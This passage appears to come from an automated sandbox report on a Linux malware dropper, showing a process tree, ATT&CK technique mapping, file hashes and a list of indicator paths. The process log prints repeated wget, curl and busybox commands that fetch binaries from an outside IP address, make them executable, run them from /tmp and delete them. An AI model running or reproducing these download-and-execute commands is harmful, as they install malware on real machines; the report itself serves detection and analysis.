  chmod 777 Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  2⤵
  - File and Directory Permissions Modification
  PID:963
- /tmp/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  ./Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  2⤵
  - Executes dropped EXE
  PID:964
- /bin/rm
  rm Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
  2⤵
  PID:965
- /usr/bin/wget
  wget http://216.126.231.240/bins/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  2⤵
  PID:966
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:967
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  2⤵
  PID:968
- /bin/chmod
  chmod 777 lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  2⤵
  - File and Directory Permissions Modification
  PID:969
- /tmp/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  ./lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  2⤵
  - Executes dropped EXE
  PID:970
- /bin/rm
  rm lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
  2⤵
  PID:971
- /usr/bin/wget
  wget http://216.126.231.240/bins/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  2⤵
  PID:972
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:973
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  2⤵
  PID:974
- /bin/chmod
  chmod 777 iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  2⤵
  - File and Directory Permissions Modification
  PID:975
- /tmp/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  ./iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  2⤵
  - Executes dropped EXE
  PID:976
- /bin/rm
  rm iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
  2⤵
  PID:977
- /usr/bin/wget
  wget http://216.126.231.240/bins/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  2⤵
  PID:978
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:979
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  2⤵
  PID:980
- /bin/chmod
  chmod 777 iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  2⤵
  - File and Directory Permissions Modification
  PID:981
- /tmp/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  ./iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  2⤵
  - Executes dropped EXE
  PID:982
- /bin/rm
  rm iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
  2⤵
  PID:983

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit
/tmp/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO

Filesize
176B

MD5
e1732e70f015e99d14dff1eeeaec9966

SHA1
c28358cd15b9a0bea63c5b2ed0c9b8d5cb006113

SHA256
6de94db8afc535ef95ba6c6290317d20e50312c146186cb86a4210770c1a741e

SHA512
6ac4f83ce675f8a7855c18eea51c654f19e66bfa335a5125d06ceb4293ecef3a6a12a4e57809e9531dd13b83e1d591e476973e88094fa361c0847dbdeb5923a7

Download Submit

ioc	pid	Process
/tmp/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO	741	lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
/tmp/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat	748	AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
/tmp/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN	756	KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
/tmp/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp	786	MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
/tmp/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z	810	DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
/tmp/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7	817	gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
/tmp/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu	826	Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
/tmp/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z	849	lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
/tmp/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r	868	iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
/tmp/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1	874	iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1
/tmp/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV	880	oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
/tmp/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ	886	gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
/tmp/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf	892	h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
/tmp/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj	898	gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
/tmp/oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV	904	oQYBW264lq8uefBX7bUHBdjmAK3xW5QSZV
/tmp/gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ	910	gwF4VVYCoPfJrMO67dl3r34e7aiq2K5iQJ
/tmp/h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf	916	h08wyeoTzm8NxPe5TjFBrCJiMkwbCyBQGf
/tmp/gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj	922	gNSAIgabmOle7vRaXT9DiYY3kQiUlqSPVj
/tmp/lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO	928	lGT5bEpS6JeS31XoyUUM8ztXmIAAOHwocO
/tmp/AbZDorGA28H0E3dHfaRN80ddRvv7THmnat	934	AbZDorGA28H0E3dHfaRN80ddRvv7THmnat
/tmp/KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN	940	KyBoNcE2aGRLx1OyIdWcAYJaKS2YTu87FN
/tmp/MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp	946	MZ6kK0jZKorCi5RkvNHeXmXcuN8FyH4Mlp
/tmp/DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z	952	DlOilWQHjd8mPqqlCQA0IXBrdxTtV6a85z
/tmp/gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7	958	gwQwLqhbTdpN5BHXIlYAh1d44Je3wReSE7
/tmp/Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu	964	Mvp4XAbdXKbm9vYaELUw0CFlesOhxV35bu
/tmp/lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z	970	lyS2rSVdCzEiSvNLZ1v7zgQk2KnVXOTx5z
/tmp/iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r	976	iiqF0OMHInvJSmSVUYe1Lj1XPTZdLBag0r
/tmp/iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1	982	iOdfap7UL2Pf9i2bvQGnbAtanvH4FKU5c1